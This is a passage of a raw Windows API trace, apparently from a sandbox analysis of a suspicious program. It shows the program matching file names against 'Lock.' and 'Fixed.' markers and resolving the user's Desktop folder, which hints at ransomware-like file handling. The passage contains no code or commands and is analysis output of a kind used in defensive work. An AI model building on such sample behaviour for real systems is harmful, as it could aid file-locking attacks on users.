RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0102.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MdUrzCG7I8VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dUrzCG7I8VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UrzCG7I8VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rzCG7I8VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zCG7I8VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CG7I8VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G7I8VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7I8VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I8VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VQVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QVwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VwhMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="whMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hMz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mz8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.867] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0102.867] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0102.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa6760 [0102.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MdUrzCG7I8VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dUrzCG7I8VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UrzCG7I8VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rzCG7I8VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zCG7I8VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CG7I8VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G7I8VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7I8VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I8VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VQVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QVwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VwhMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="whMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hMz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mz8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z8.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0102.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6178 [0102.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6178 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6728 | out: hHeap=0x2af0000) returned 1 [0102.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0102.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0102.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.869] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0102.869] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0102.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0102.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726a8 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0102.869] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0102.869] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa64f8 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75510 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa64f8 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0102.871] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0102.871] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6290 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0102.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0102.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6290 | out: hHeap=0x2af0000) returned 1 [0102.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0102.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0102.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0102.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0102.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0102.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0102.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0102.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0102.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, 